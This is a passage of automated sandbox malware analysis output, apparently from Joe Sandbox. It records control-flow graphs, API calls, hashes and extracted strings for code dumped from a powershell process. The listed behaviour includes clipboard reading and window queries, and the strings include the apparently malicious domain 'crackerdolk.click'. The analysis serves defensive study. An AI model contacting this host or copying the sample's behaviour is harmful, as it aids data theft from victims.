                                                                                        control_flow_graph 558 4fd92e-4fd958 call 4f95d0 CoUninitialize 561 4fd960-4fd99b 558->561 561->561 562 4fd99d-4fd9af 561->562 563 4fd9b0-4fd9eb 562->563 563->563 564 4fd9ed-4fda35 563->564 565 4fda40-4fda6c 564->565 565->565 566 4fda6e-4fda78 565->566 567 4fda8b-4fda98 566->567 568 4fda7a-4fda7f 566->568 570 4fdaad 567->570 571 4fda9a-4fda9f 567->571 569 4fda80-4fda89 568->569 569->567 569->569 573 4fdab0-4fdabb 570->573 572 4fdaa0-4fdaa9 571->572 572->572 574 4fdaab 572->574 575 4fdadd-4fdae0 573->575 576 4fdabd-4fdac4 573->576 574->573 578 4fdae3-4fdaee 575->578 577 4fdad0-4fdad9 576->577 577->577 579 4fdadb 577->579 580 4fdb0b-4fdb13 578->580 581 4fdaf0-4fdaf1 578->581 579->578 583 4fdb2b-4fdb37 580->583 584 4fdb15-4fdb16 580->584 582 4fdb00-4fdb09 581->582 582->580 582->582 586 4fdb39-4fdb3b 583->586 587 4fdb51-4fdc0a 583->587 585 4fdb20-4fdb29 584->585 585->583 585->585 588 4fdb40-4fdb4d 586->588 589 4fdc10-4fdc4c 587->589 588->588 590 4fdb4f 588->590 589->589 591 4fdc4e-4fdc68 589->591 590->587 592 4fdc70-4fdcb9 591->592 592->592 593 4fdcbb-4fdcd7 call 4fb610 592->593 595 4fdcdc-4fdcf6 593->595
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: Uninitialize
                                                                                        • String ID: '$6,$9 54$9>?}$M^8$crackerdolk.click$dobu$q$]8
                                                                                        • API String ID: 3861434553-3077452486
                                                                                        • Opcode ID: 16efa9ad63bd135cce02c456b9baa7bd4846dca01f83d5684f81c81b3320678c
                                                                                        • Instruction ID: c71f6549aa088d4db9252a55c1056b6f49606e42d6bb26e2e2dfb9013e2ce577
                                                                                        • Opcode Fuzzy Hash: 16efa9ad63bd135cce02c456b9baa7bd4846dca01f83d5684f81c81b3320678c
                                                                                        • Instruction Fuzzy Hash: B7B136B5A087828FD719CF39C490622BFE2FF96300B18969DC9D64B75AC739E805CB54

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1133 520ad3-520aff 1134 520b01-520b04 1133->1134 1135 520b06-520b73 1134->1135 1136 520b75-520ca4 SysAllocString 1134->1136 1135->1134 1137 520ca6-520ca9 1136->1137 1138 520cab-520cea 1137->1138 1139 520cec-520d26 1137->1139 1138->1137 1141 520d30-520d5e 1139->1141
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocString
                                                                                        • String ID: 0
                                                                                        • API String ID: 2525500382-4108050209
                                                                                        • Opcode ID: bfdc85702b37b556c0f6c65f504c12711a8aa1a3fc491bb98b5c22c56bb06963
                                                                                        • Instruction ID: 4c98a3b3d65d00f8c70cb5dd31cc118ca6fd3e825084ab53dbcd0c459326d42b
                                                                                        • Opcode Fuzzy Hash: bfdc85702b37b556c0f6c65f504c12711a8aa1a3fc491bb98b5c22c56bb06963
                                                                                        • Instruction Fuzzy Hash: 38912C21108FC18ED336CA3C8858757BFD15B67224F084B9CD1F78BBE6C6A5A50AC326

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1142 51ef01-51ef45 1143 51ef47-51ef4a 1142->1143 1144 51ef7a-51f196 SysAllocString 1143->1144 1145 51ef4c-51ef78 1143->1145 1146 51f198-51f19b 1144->1146 1145->1143 1147 51f19d-51f1dc 1146->1147 1148 51f1de-51f228 1146->1148 1147->1146 1150 51f232-51f258 1148->1150
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocString
                                                                                        • String ID: 0
                                                                                        • API String ID: 2525500382-4108050209
                                                                                        • Opcode ID: d3ca8530c2dc15eac2676921be8b9d141e707f2925a078a578c2a56c9366e0cf
                                                                                        • Instruction ID: ee825b077f864c35661142fc15a1630a25c74bfdd0e976a4a80ff6024d8d36fb
                                                                                        • Opcode Fuzzy Hash: d3ca8530c2dc15eac2676921be8b9d141e707f2925a078a578c2a56c9366e0cf
                                                                                        • Instruction Fuzzy Hash: 97A1B130108FC2CAD3328A3C88587D7BFD25B66324F484B9DD5FA4A3E2D3652146C766

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1151 51e37f-51e4ba SysFreeString 1152 51e4bc-51e4bf 1151->1152 1153 51e4c1-51e531 1152->1153 1154 51e533-51e576 1152->1154 1153->1152 1156 51e580-51e5ac 1154->1156
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID: 0
                                                                                        • API String ID: 3341692771-4108050209
                                                                                        • Opcode ID: 4b1161859cf55d63a5a1a9d43e0b10a73c34fc858cf48bfc9e3a243254369843
                                                                                        • Instruction ID: d61bf50c1bd868d61c4dbadf79507751756bfa963663284d8a824de84af2f567
                                                                                        • Opcode Fuzzy Hash: 4b1161859cf55d63a5a1a9d43e0b10a73c34fc858cf48bfc9e3a243254369843
                                                                                        • Instruction Fuzzy Hash: DE81E921118FC2CED336C63C8948247BFD16B67228F484B9CD1E64BBE6D3A5B506C766
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 004FE54E
                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 004FE693
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: f6924f77a53af76cf60f833cded16e40555da31aad29a6f6647ad2ad81c3f157
                                                                                        • Instruction ID: 7c23f3ae252ce82beff648c9599baa1918529e7fe4155dcb3084a37f9323301a
                                                                                        • Opcode Fuzzy Hash: f6924f77a53af76cf60f833cded16e40555da31aad29a6f6647ad2ad81c3f157
                                                                                        • Instruction Fuzzy Hash: 6041B6B4810B40AFD370EF39990B7137EB8AB05250F504B1DF9EA866D4E631A4198BD7
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 0052C079
                                                                                        • GetForegroundWindow.USER32 ref: 0052C07F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: ForegroundWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2020703349-0
                                                                                        • Opcode ID: 7ab5d35f40e09c2d1ff307d139dd38560b2e79409fad8afdd6820f1b3f74559f
                                                                                        • Instruction ID: bf73c615f043aa8fa955a241de9892360e8b0689dd2c876f551405bfe06580d5
                                                                                        • Opcode Fuzzy Hash: 7ab5d35f40e09c2d1ff307d139dd38560b2e79409fad8afdd6820f1b3f74559f
                                                                                        • Instruction Fuzzy Hash: C4C04C351502009BC244AB64FD79414BBE0F7292457045858E953C23F0CB20640CAE50
                                                                                        APIs
                                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 0052441A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultLanguageUser
                                                                                        • String ID:
                                                                                        • API String ID: 95929093-0
                                                                                        • Opcode ID: dc5704a510b1ad666563ac920797ff839311b30826f94aae76c288415e0549ea
                                                                                        • Instruction ID: d16e2ac6a7a4c198f4f4cd2d7c389633b16ff42fcf8565ac3006ec3ebbc8d973
                                                                                        • Opcode Fuzzy Hash: dc5704a510b1ad666563ac920797ff839311b30826f94aae76c288415e0549ea
                                                                                        • Instruction Fuzzy Hash: B821F632A08A518FC719CE788D8025E7BA36BE9214F2DC2ECC595573DAD9316906CB50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: 3dee232f5026bef49767c8c23f9f817765783fb90bf031f5e3247127f95abc50
                                                                                        • Instruction ID: 05e44430ed7b21ef3a64c05b56aa3a083420c8eebf54a0189465c1ef72fec297
                                                                                        • Opcode Fuzzy Hash: 3dee232f5026bef49767c8c23f9f817765783fb90bf031f5e3247127f95abc50
                                                                                        • Instruction Fuzzy Hash: E501F9B46057018FD304DF28C5A871ABBF1FBC5304F10985CE5958B3A0CB79A948CF82
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: a9cc4ec2a0e9070867273ad0116c7da883323fc752efb1c866931f4f841d43d8
                                                                                        • Instruction ID: 4b7d49f3f670f845a71bac219934d78f7d48da3a3c9e452588990db23df98d34
                                                                                        • Opcode Fuzzy Hash: a9cc4ec2a0e9070867273ad0116c7da883323fc752efb1c866931f4f841d43d8
                                                                                        • Instruction Fuzzy Hash: 2FF0A471509B028FE310DF34D55830BBBF1BB84318F158A1CE4A54B394C7B9A5498F82
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004FE6E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 640775948-0
                                                                                        • Opcode ID: 9623f48ce315f05a39536a9efe4ea3550ab0bcfd5536f71b4ab998722ec5ff73
                                                                                        • Instruction ID: 7185558a66a3efb1d7c2ff6d20982fa0b9128c2fcb9bd5955575bd69ed030205
                                                                                        • Opcode Fuzzy Hash: 9623f48ce315f05a39536a9efe4ea3550ab0bcfd5536f71b4ab998722ec5ff73
                                                                                        • Instruction Fuzzy Hash: BFD0C9303C47547AF1784B58EC67F5432505715F11F742608B362FE3D0C9E0BA059609
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0050289F), ref: 00529AC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 4bb7234a0cea3639edbaef1e27adc2fe2d7832942cab6b74f621856f7df180c0
                                                                                        • Instruction ID: 0879a0e2e975c6099aa1cf37075ec0dade10b52d787369d1c730e959cec21f77
                                                                                        • Opcode Fuzzy Hash: 4bb7234a0cea3639edbaef1e27adc2fe2d7832942cab6b74f621856f7df180c0
                                                                                        • Instruction Fuzzy Hash: B3D0C931845132EBCA102F28BC09BCB7F94AF59360F0748A1F545AA1B6D624AC959AD0
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,64746910,6474690E,00000000,00000000,?,00000000), ref: 00507EF1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: $UNOL$[7`1${P
                                                                                        • API String ID: 237503144-1182418270
                                                                                        • Opcode ID: 8b9389d64b956c5e861dc109d4b7950877fe255923acbae69cfec6f6ee8e47ee
                                                                                        • Instruction ID: 34fc545890d0736d5be48102d44633ebc16610f95089ace6e2a67f10dc546d07
                                                                                        • Opcode Fuzzy Hash: 8b9389d64b956c5e861dc109d4b7950877fe255923acbae69cfec6f6ee8e47ee
                                                                                        • Instruction Fuzzy Hash: E472F476A083518BD728CF28C8917BFBBE1FF99314F18896CE4C687291E7389945C752
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: C$\$k$r$y
                                                                                        • API String ID: 0-1251240214
                                                                                        • Opcode ID: b454e80b01e7cb8f017668e0b6828088b177346fd50aa4c5a0b5204ab3041a73
                                                                                        • Instruction ID: 209d9c75cbb1576ca2a22da1da166f29e2cf2a99623f6e51d3387828d8b73cce
                                                                                        • Opcode Fuzzy Hash: b454e80b01e7cb8f017668e0b6828088b177346fd50aa4c5a0b5204ab3041a73
                                                                                        • Instruction Fuzzy Hash: 67128B7560CB808BC724DB38C5953AEBFE1BB89314F148E2EE5D9873D2D63885458B17
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00512CB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: AU$SH$Y^
                                                                                        • API String ID: 237503144-2404045158
                                                                                        • Opcode ID: a42a32c526fa1d70f49cb588c906952e04e6b15d3ec8926bc163f5856abfa850
                                                                                        • Instruction ID: a0593ffea3fe503f621a68f00b1e4d57e2788a13774a41eb8bd6cb4b956e1aa3
                                                                                        • Opcode Fuzzy Hash: a42a32c526fa1d70f49cb588c906952e04e6b15d3ec8926bc163f5856abfa850
                                                                                        • Instruction Fuzzy Hash: E68167B66083548FD314CF64DC4175FBBE5EBD5304F09892DE9945B381DBB4980ACB92
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 1006321803-0
                                                                                        • Opcode ID: 467cc0855e692c2dc5e5e94cc9aebb3b0cbb0d2a8434b5cd0941b1d0188ec625
                                                                                        • Instruction ID: e3a9f8abb049faa5ccfcbc4548f2c306a8517300f2a34742b1d1dcab940d9e61
                                                                                        • Opcode Fuzzy Hash: 467cc0855e692c2dc5e5e94cc9aebb3b0cbb0d2a8434b5cd0941b1d0188ec625
                                                                                        • Instruction Fuzzy Hash: 8451F8B1D08B918FD700AB78948936EBFE0BF26314F048A3CD595876C5D3789458C792
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 'j7h$+r>p$2v6t$>n<l$VO$VT$WY
                                                                                        • API String ID: 0-3758922207
                                                                                        • Opcode ID: 2e87b9b9207bedf8b8c24dac86019e548294c9a59a189cc2f46d5a93a0c5517f
                                                                                        • Instruction ID: a7d6387d870e453840ff1cc2b5f3386401738ae71f747f4e0375ed7d773ce94d
                                                                                        • Opcode Fuzzy Hash: 2e87b9b9207bedf8b8c24dac86019e548294c9a59a189cc2f46d5a93a0c5517f
                                                                                        • Instruction Fuzzy Hash: 4A618CB42083918BD7309F689812BABBBF0FF92314F041D2CD5D99B252D7788A55CB5B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2OH:$6??5$==Vg$>:<*$pW5C$v$%6
                                                                                        • API String ID: 0-1921259365
                                                                                        • Opcode ID: 9b35105783de2356717e1e10648213c1e87992ee012df0f089e871f47f7e0671
                                                                                        • Instruction ID: f3d85ff63567504d612b6fa4404110c2eed62ec5328978a973126f8d208d0d99
                                                                                        • Opcode Fuzzy Hash: 9b35105783de2356717e1e10648213c1e87992ee012df0f089e871f47f7e0671
                                                                                        • Instruction Fuzzy Hash: DED154B190C384DBD7049F24E8912ABBFE4BF96304F4849BDE5C28B351E339E9458B52
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: B~{q$OvRY$`ian$jN@|$w$~~|x
                                                                                        • API String ID: 0-325120139
                                                                                        • Opcode ID: a22bad063c165d0bd93474fcd8c7372986f21cf75cb7bb9ce54dbef89405fceb
                                                                                        • Instruction ID: 69549364bea0018fc000575a13cb56d5db9955f1784fa68ba1b13e0a0db871b7
                                                                                        • Opcode Fuzzy Hash: a22bad063c165d0bd93474fcd8c7372986f21cf75cb7bb9ce54dbef89405fceb
                                                                                        • Instruction Fuzzy Hash: EBA1167164C3858BC316CF6984A076BFFE1AFE7344F08496DE5C54B382D279890ACB96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: J6\0$MIA$P[$[R$|jRl
                                                                                        • API String ID: 0-4039841171
                                                                                        • Opcode ID: d6d94da02e8cd90508f8c5309ad9ffaf61e439cbbe2c4c0beee08b07978d7d82
                                                                                        • Instruction ID: fb4f183841528b28f69e7c4f423a14482d1b9a41c2764bb0485e797ba80fd3eb
